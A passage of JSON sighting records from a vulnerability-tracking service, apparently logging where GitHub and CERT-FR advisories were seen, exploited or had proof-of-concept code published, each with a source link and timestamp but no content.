"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20190513-SECUREBOOT", "type": "seen", "source": "Telegram/7Dig03ZzYy6YuIMrxr0eoO8Sk_-WmRTHI4lqp_Q9NI8qVQ", "content": "", "creation_timestamp": "2026-08-10T00:00:09.683448Z"}, {"uuid": "2a788e68-a62f-44e2-90da-6fdf8d9dd54d", "vulnerability_lookup_origin": "caeb2787-0d58-4236-9039-7c86c3e566f3", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6V53-HR58-556R", "type": "exploited", "source": "https://db.gcve.eu/known-exploited-vulnerabilities-catalog/d3cd097a-16af-468e-99b3-2ad9edd2b2df", "content": "", "creation_timestamp": "2026-09-10T08:22:36.296925Z"}, {"uuid": "774da0e3-3bd4-4bc7-a21b-f34b40de1b1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wv64-j4fq-5f9x", "type": "seen", "source": "https://gist.github.com/alon710/221abefe2acc671410201ad821c4e263", "content": "", "creation_timestamp": "2026-09-16T12:31:32.443019Z"}, {"uuid": "1c8f9c60-dfdc-469b-a7ed-c89f77844c01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c759-cx9p-mrwq", "type": "seen", "source": "https://gist.github.com/alon710/0d3b32340b0e22813aee7b5053c88ded", "content": "", "creation_timestamp": "2026-09-23T10:32:03.737062Z"}, {"uuid": "bcd3c9dc-c2e2-4bc5-ad47-9e5e6d2c9e47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-frch-4w6v-q5xx", "type": "seen", "source": "https://gist.github.com/alon710/7b1d3264d9c8eccf7d44ef50bef96c32", "content": "", "creation_timestamp": "2026-09-23T10:06:23.200257Z"}, {"uuid": "96ae87f3-b755-4022-b65c-b3b7131096c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vv3m-f8x4-7377", "type": "seen", "source": "https://gist.github.com/alon710/7a56289e51a2a4574f7acda3d1a9a360", "content": "", "creation_timestamp": "2026-09-23T10:06:22.971065Z"}, {"uuid": "c864c1b9-2518-4468-9fd3-d5ed02ccff06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-65h7-9wrw-629c", "type": "seen", "source": "https://gist.github.com/alon710/8bd3e264f91a00f434cd5f27c8d28e71", "content": "", "creation_timestamp": "2026-09-15T16:31:11.985087Z"}, {"uuid": "d0a37dde-5248-4d3d-a8ac-634d3b0352b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7GWW-X7FH-JF9J", "type": "seen", "source": "https://t.me/bdufstecru/3433", "content": "", "creation_timestamp": "2026-09-15T15:00:06.169310Z"}, {"uuid": "c180f3f1-8b76-4eb7-90bc-d03736551f1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W6F5-V2H6-G786", "type": "seen", "source": "https://t.me/bdufstecru/3436", "content": "", "creation_timestamp": "2026-09-15T15:00:06.029167Z"}, {"uuid": "5528c526-58e4-424a-8463-e21479885729", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RVX4-FFVW-M9Q3", "type": "seen", "source": "https://t.me/bdufstecru/3440", "content": "", "creation_timestamp": "2026-09-15T15:00:05.898881Z"}, {"uuid": "a1969e0d-3ccd-4137-b551-b149f1d6315b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R3J6-GPJW-QFJR", "type": "seen", "source": "https://t.me/bdufstecru/3437", "content": "", "creation_timestamp": "2026-09-15T15:00:05.809092Z"}, {"uuid": "f9073f48-7433-43c8-8789-64d333316158", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-72VJ-PVM4-MM7X", "type": "seen", "source": "https://t.me/bdufstecru/3445", "content": "", "creation_timestamp": "2026-09-15T15:00:05.536035Z"}, {"uuid": "adad5ea2-35f7-473a-8bfa-ea78f84667a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-73j8-2gch-69rq", "type": "seen", "source": "https://gist.github.com/konard/209ca9fc9671068c532f067da228f8c0", "content": "", "creation_timestamp": "2026-09-15T14:41:52.719792Z"}, {"uuid": "9b113ca0-a03e-43f8-aa73-dc342b989643", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-039", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/117269813619270733", "content": "", "creation_timestamp": "2026-09-14T14:15:59.982964Z"}, {"uuid": "251a730e-e5e8-479a-8009-3c1a4f130a26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-039", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mvicd553l22y", "content": "", "creation_timestamp": "2026-09-14T14:15:50.908022Z"}, {"uuid": "53111989-0027-4e62-93f9-17beb13459d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p498-v437-472g", "type": "seen", "source": "https://gist.github.com/konard/3df64f94bedef28845e3787306d32d25", "content": "", "creation_timestamp": "2026-09-13T23:02:29.363273Z"}, {"uuid": "b372807f-f391-40d0-bcb5-7991a0090c29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2GG9-6P7W-6CPJ", "type": "published-proof-of-concept", "source": "https://t.me/CYPERMRED/34", "content": "", "creation_timestamp": "2026-09-13T20:00:04.394129Z"}, {"uuid": "f3daecee-3a3b-4f9b-8cbb-32dd3ab45e47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v77h-2w3m-94hx", "type": "seen", "source": "https://gist.github.com/alon710/238c8eedad7470353ae0c3d6c2eceacc", "content": "", "creation_timestamp": "2026-09-12T02:32:49.678305Z"}, {"uuid": "eb5aac64-c17a-4bc5-8817-3efafd31c483", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8wqc-v2q8-vff2", "type": "seen", "source": "https://gist.github.com/alon710/8e9884324f7c5a6dc21f24fa20ed79e2", "content": "", "creation_timestamp": "2026-09-12T01:32:31.082868Z"}, {"uuid": "649a3f8f-b004-4463-9e51-aaf5513e4737", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rqx4-3f6q-3x2v", "type": "seen", "source": "https://bsky.app/profile/kyisaiah47.thecompound.tech/post/3mvbuxflzm322", "content": "", "creation_timestamp": "2026-09-12T01:00:39.767927Z"}, {"uuid": "f3e4076a-a7f5-4f5c-a033-edd36b364889", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rqx4-3f6q-3x2v", "type": "seen", "source": "https://gist.github.com/alon710/12e5af59440fe17bf499cbab29b7b498", "content": "", "creation_timestamp": "2026-09-12T00:32:03.897212Z"}, {"uuid": "db445650-2784-44eb-8688-4f9e1a1fe22a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h8m9-jgf8-vwvp", "type": "seen", "source": "https://gist.github.com/alon710/43186f210d41aaa752fb23f70074de25", "content": "", "creation_timestamp": "2026-09-11T22:32:02.610150Z"}, {"uuid": "0fe8c57c-cf74-44e7-ab6a-30f76ff9cbd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-H637-C88J-47WQ", "type": "published-proof-of-concept", "source": "https://t.me/cissp/1946", "content": "", "creation_timestamp": "2026-09-11T22:00:04.787048Z"}, {"uuid": "aef98bf4-2c7c-4f1d-81de-9618faa72fc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-CCX2-W2R4-X649", "type": "published-proof-of-concept", "source": "https://t.me/cissp/1946", "content": "", "creation_timestamp": "2026-09-11T22:00:04.725435Z"}, {"uuid": "96dfd867-25d3-4651-8046-056f2f5268d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7MH3-GQ28-GFRQ", "type": "published-proof-of-concept", "source": "https://t.me/cissp/1946", "content": "", "creation_timestamp": "2026-09-11T22:00:04.668741Z"}, {"uuid": "417328a6-cba7-4ee0-9a93-d5f3e591415f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vjfw-cpmh-xwv3", "type": "seen", "source": "https://gist.github.com/alon710/411b8b7ebc2e2afc168687232502ef72", "content": "", "creation_timestamp": "2026-09-11T21:32:59.362510Z"}, {"uuid": "eddadb63-4806-4528-a6e1-70acf997212e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wjwr-xfp9-r66p", "type": "seen", "source": "https://gist.github.com/alon710/57a0435a9d7a14ff9a1f3ca71156beef", "content": "", "creation_timestamp": "2026-09-11T16:33:17.571457Z"}, {"uuid": "2ce9f9fb-e2d9-42d5-bbfe-626ab09750b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8r35-5x5r-hv74", "type": "seen", "source": "https://gist.github.com/alon710/b936d0e8b1b08a24ad813407363272e8", "content": "", "creation_timestamp": "2026-09-11T15:31:47.762085Z"}, {"uuid": "869dd41e-4ca4-44dd-9661-eef70eb0c791", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2j8r-3c22-8565", "type": "seen", "source": "https://gist.github.com/ViveliDuCh/de46bd2e75cb209d3e5ba8ceaac367db", "content": "", "creation_timestamp": "2026-09-11T15:21:26.998071Z"}, {"uuid": "15bfcef2-d094-4a89-b2c9-95846461d1c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-527h-q9f6-p7qx", "type": "seen", "source": "https://gist.github.com/ViveliDuCh/de46bd2e75cb209d3e5ba8ceaac367db", "content": "", "creation_timestamp": "2026-09-11T15:21:26.945852Z"}, {"uuid": "bf6fa0ee-94a2-4193-9b51-14dcdc0b19d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v39v-59xw-j98g", "type": "seen", "source": "https://gist.github.com/alon710/e350315aab7316ce10d2d2056b580adf", "content": "", "creation_timestamp": "2026-09-11T14:31:53.141809Z"}, {"uuid": "e0c6b8f5-65da-42bc-99b5-fcb12ca5a5b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3g9q-v48f-hh9w", "type": "seen", "source": "https://gist.github.com/alon710/d61ce1f74a389eb9b11e0ada4e2c5671", "content": "", "creation_timestamp": "2026-09-11T13:31:47.985250Z"}, {"uuid": "d25ce03e-ac5b-407c-a2f9-956f3e2dd419", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2p48-j3qc-rx9f", "type": "seen", "source": "https://gist.github.com/alon710/51fe1c5c2b206d4c1fc4589bae05ba41", "content": "", "creation_timestamp": "2026-09-11T12:32:14.067809Z"}, {"uuid": "ee4baa7a-29df-4683-9b95-bdbdb21b88fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-38xv-hf3p-h7mq", "type": "seen", "source": "https://gist.github.com/alon710/31db43b5866ca861d12e36661fc88337", "content": "", "creation_timestamp": "2026-09-11T11:32:31.583272Z"}, {"uuid": "ef9ef395-2612-41fe-9a05-43ad193d77a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5293-FCM6-FH8V", "type": "seen", "source": "https://t.me/GithubRedTeam/101902", "content": "", "creation_timestamp": "2026-09-10T09:00:06.499869Z"}, {"uuid": "b586e0c5-72b9-4aef-aa6e-a29030694d12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4f63-89w9-3jjv", "type": "seen", "source": "https://gist.github.com/adityapatra2010/2b625bb08685e0029233e1ceb7172cc6", "content": "", "creation_timestamp": "2026-09-10T06:54:24.299350Z"}, {"uuid": "dbd538ea-d58e-4296-9146-231b1d9b971a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-HXJG-93WC-H8P8", "type": "seen", "source": "https://gist.github.com/alon710/cd4bf1198b3a3ab59c651c0e272e75c0", "content": "", "creation_timestamp": "2026-09-10T05:31:15.721426Z"}, {"uuid": "5cbcfaf5-d1ff-493f-bdb9-e592e4ed6ccf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jqhh-cjmq-vmv6", "type": "seen", "source": "https://gist.github.com/alon710/401536538bb41a7576b21df62b940fb2", "content": "", "creation_timestamp": "2026-09-10T02:31:55.658390Z"}, {"uuid": "215deba6-46fe-488c-b13f-51bec7401a48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5qpq-xqfv-j9pg", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mv4xgjnud32l", "content": "", "creation_timestamp": "2026-09-10T02:01:36.265103Z"}, {"uuid": "e75f6934-c828-40f6-9b62-b1e83af800fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3cgp-3cqx-j8w2", "type": "seen", "source": "https://gist.github.com/alon710/48cdccd93c734ae28b1351fbe3368bd9", "content": "", "creation_timestamp": "2026-09-10T00:32:33.526565Z"}, {"uuid": "8f4bff70-7e25-4d70-8545-de565989fd2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P6HP-93WP-FH6P", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/101570", "content": "", "creation_timestamp": "2026-09-10T00:00:49.816442Z"}, {"uuid": "a25024e8-9664-4972-b4b1-c41e089038cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-96p9-rh4f-92cf", "type": "seen", "source": "https://gist.github.com/alon710/c5bce716a2c740f354075cb003953b3f", "content": "", "creation_timestamp": "2026-09-09T09:33:16.703522Z"}, {"uuid": "c5b8d18b-c936-49cb-89f8-4f3f586ad512", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6mj3-qw4j-hgrw", "type": "seen", "source": "https://gist.github.com/alon710/6001224d6aa2414b1f8b69a0a75f3dac", "content": "", "creation_timestamp": "2026-09-08T21:33:08.398244Z"}, {"uuid": "d3199c05-82ab-4d5b-8f9d-2c0ff46295af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3wxw-xv34-2frg", "type": "seen", "source": "https://gist.github.com/alon710/203f3e8540b97026337742aaf8fa0eb2", "content": "", "creation_timestamp": "2026-09-08T21:28:14.089286Z"}, {"uuid": "af7d3b9c-c9d1-4258-abf3-9ab405b46dfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qqjf-53cj-pwvv", "type": "seen", "source": "https://bsky.app/profile/whatsnew.fyi/post/3muwodkwr3p24", "content": "", "creation_timestamp": "2026-09-07T14:02:55.321842Z"}, {"uuid": "8f3716b0-b9c6-4e38-83b0-66de9a125c69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-038", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/117229944394912620", "content": "", "creation_timestamp": "2026-09-07T13:16:41.751254Z"}, {"uuid": "de5be60b-c2b2-4cf6-922f-0d9fe798148b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-038", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3muwlqpl73d2v", "content": "", "creation_timestamp": "2026-09-07T13:16:34.591432Z"}, {"uuid": "949f46f0-0f8e-4082-8842-7ea0074083d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ALE-009", "type": "seen", "source": "https://bsky.app/profile/bot-de-florian.bsky.social/post/3muvtapkdgy2f", "content": "", "creation_timestamp": "2026-09-07T05:58:08.471738Z"}, {"uuid": "bec7faa6-9f75-4042-8ccd-d2d924b5edcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8PJX-JJ86-J47P", "type": "published-proof-of-concept", "source": "https://t.me/hacking_Attack/34328", "content": "", "creation_timestamp": "2026-09-07T01:00:05.492464Z"}, {"uuid": "c21c8979-f62b-475e-a6ca-4802c5a57ce4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-73j8-2gch-69rq", "type": "seen", "source": "https://gist.github.com/konard/558c58e5fff2aafc3a590f0980b9c65a", "content": "", "creation_timestamp": "2026-09-05T17:05:59.987850Z"}, {"uuid": "2910c356-ba04-4530-bebe-bd3bd23d886c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-73j8-2gch-69rq", "type": "seen", "source": "https://gist.github.com/konard/1f348647ebe071c63cce754dc60e1085", "content": "", "creation_timestamp": "2026-09-05T16:47:42.431537Z"}, {"uuid": "bd6376a3-c9c8-47f3-87ca-f6b99da21642", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6v2g-fpxh-pmmh", "type": "seen", "source": "https://gist.github.com/alon710/e9c9321eb429f1e237680df95cb576b8", "content": "", "creation_timestamp": "2026-09-05T14:31:44.509797Z"}, {"uuid": "24da240a-f513-4278-a023-fc0571788696", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-53R2-MQ99-F532", "type": "published-proof-of-concept", "source": "https://t.me/hacking_Attack/63081", "content": "", "creation_timestamp": "2026-09-05T14:00:04.052536Z"}, {"uuid": "57b91657-eea3-4ec7-8ccd-35f8bea08c19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c6mw-8xh8-gpq6", "type": "seen", "source": "https://gist.github.com/alon710/25de86a6a1fbd873e6db813795a47505", "content": "", "creation_timestamp": "2026-09-05T13:31:53.790047Z"}, {"uuid": "5ea22805-39e0-4583-8ac8-dbefa0b7a64a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-73j8-2gch-69rq", "type": "seen", "source": "https://gist.github.com/konard/512a90a3806a1c7a5364f6d1e4474f78", "content": "", "creation_timestamp": "2026-09-05T13:03:30.692652Z"}, {"uuid": "3923a6bf-dc48-424a-ac4c-d577e47255fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-848m-r628-vrxw", "type": "seen", "source": "https://gist.github.com/alon710/c72bc251650f3404e8bd8c874dab4c7c", "content": "", "creation_timestamp": "2026-09-05T12:32:19.150849Z"}, {"uuid": "e7701d6c-d78e-4a10-ad4d-8503482023f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-66r2-5gwj-gxm2", "type": "seen", "source": "https://gist.github.com/alon710/e67772431cb25b3e742f3376d1f6891a", "content": "", "creation_timestamp": "2026-09-05T11:31:54.093218Z"}, {"uuid": "78d974ee-1cf6-411d-9b6a-ab0ba7f6b5bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5w7r-f4cg-rqq7", "type": "seen", "source": "https://gist.github.com/alon710/abc6a26fdebf669c87f091f304527249", "content": "", "creation_timestamp": "2026-09-05T10:31:56.315117Z"}, {"uuid": "a1a1d311-3af0-4c62-baee-4bd776182e62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mfrj-v65r-979c", "type": "seen", "source": "https://gist.github.com/alon710/eb15ac5c0e28dcec3fbc7013caed5d8c", "content": "", "creation_timestamp": "2026-09-05T09:31:32.394681Z"}, {"uuid": "0cbc7478-c27b-4e28-9838-8f8971796ba4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f2rw-w22v-54vh", "type": "seen", "source": "https://gist.github.com/alon710/9a2d85ba8ea8d9357fd9b222ff82f01a", "content": "", "creation_timestamp": "2026-09-05T08:31:47.849618Z"}, {"uuid": "9dd8a924-b79c-427e-a92d-083c1c217286", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-34fj-mwm6-fjfg", "type": "seen", "source": "https://gist.github.com/alon710/dc010738b4571d3213f407464873e777", "content": "", "creation_timestamp": "2026-09-05T07:32:25.113616Z"}, {"uuid": "1a2388bb-e9a2-4f90-a44a-a19416bb67ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h6w7-xxcf-w2mq", "type": "seen", "source": "https://gist.github.com/alon710/d6618765d21c6f9ee71dda70fcd7fb39", "content": "", "creation_timestamp": "2026-09-05T06:34:06.797020Z"}, {"uuid": "6d4b641b-0d89-4261-919a-01bd6559a55f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h4v5-crx2-3cv4", "type": "seen", "source": "https://gist.github.com/alon710/8e52edc7cac5d27a87a28f37b7cbdf23", "content": "", "creation_timestamp": "2026-09-05T05:32:57.584862Z"}, {"uuid": "2f2c5e02-ffcd-449e-b0f4-833b3dc7c5fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PJWM-RVH2-C87W", "type": "published-proof-of-concept", "source": "https://t.me/hacking_Attack/76471", "content": "", "creation_timestamp": "2026-09-05T05:00:04.916540Z"}, {"uuid": "76ef6891-a34c-4afd-b1a6-214240e134bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mp7r-57w4-5qm3", "type": "seen", "source": "https://gist.github.com/alon710/90178cd17fc0b9e9f8bf4b855dea8ff1", "content": "", "creation_timestamp": "2026-09-05T04:31:40.385322Z"}, {"uuid": "a0922702-2692-4c61-8bae-8ffefccd7223", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8737-qx52-hjff", "type": "seen", "source": "https://gist.github.com/alon710/f1f72dae7d8a1a049a639d5207c64786", "content": "", "creation_timestamp": "2026-09-05T03:31:23.160052Z"}, {"uuid": "389cf362-77ce-438f-8e2c-7c8320459fcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-px8p-9vwx-vf98", "type": "seen", "source": "https://gist.github.com/dirtydishes/da76401dd01226e3b880eb1c6525eed8", "content": "", "creation_timestamp": "2026-09-05T02:50:04.857141Z"}, {"uuid": "d2e058b1-8440-459f-904f-6e33b3aa4fc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hwrm-c4cx-rf4j", "type": "seen", "source": "https://gist.github.com/alon710/caaecd86a36ed3811c785ce5c946eae7", "content": "", "creation_timestamp": "2026-09-05T02:32:31.540836Z"}, {"uuid": "aaa0c994-8450-4e01-914e-cfee648b0453", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qvq9-hq6p-v378", "type": "seen", "source": "https://gist.github.com/alon710/6d84a03746a753dea4049dd4a31c2df7", "content": "", "creation_timestamp": "2026-09-03T23:31:29.806299Z"}, {"uuid": "2375f07c-c0e2-4fb2-8ba1-bf52b0eb8cc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7J72-F6WG-CXW6", "type": "seen", "source": "https://gist.github.com/alon710/4d2d0e14cc9fbf8c2c4ec8fd41b0edff", "content": "", "creation_timestamp": "2026-09-03T22:31:26.416937Z"}, {"uuid": "9b723a95-d63e-4dd7-8aeb-1411507da23f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-82x6-q7mm-w9cf", 